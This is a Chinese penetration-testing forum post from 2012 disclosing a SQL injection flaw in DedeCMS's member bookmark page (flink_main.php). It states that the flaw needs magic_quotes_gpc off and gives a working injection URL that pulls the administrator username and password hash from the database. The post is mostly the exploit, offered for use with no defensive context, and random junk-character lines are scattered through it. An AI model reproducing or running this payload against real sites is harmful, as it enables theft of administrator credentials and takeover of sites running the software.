中国网络渗透测试联盟
标题:
DedeCMS会员中心书签管理SQL注射漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:21
标题:
DedeCMS会员中心书签管理SQL注射漏洞
DedeCMS会员中心SQL注射漏洞
2 |- J; @' k. P/ E- {: Z0 B4 n$ w
需要magic_quotes_gpc = Off
2 b% ~8 e1 L- |$ g* z
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
8 {6 Z2 z+ y5 k( m1 n
9 l3 d4 Y# `3 J- p
DedeCMS会员中心书签管理SQL注射漏洞
% ?" a8 q( y' @- Z) \! b
成功利用该漏洞可获得管理员密码
8 U+ @* w0 E; O) D1 L! {: _2 Q
; r* b5 f4 L$ O) o$ l9 X
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
' r( L# ]1 I# i: i/ p" b- J
) W0 u6 H# ?4 Z" V) u
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
7 N; s R- z7 q
作者:
kook
时间:
2013-1-10 01:33
#89 顶起。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2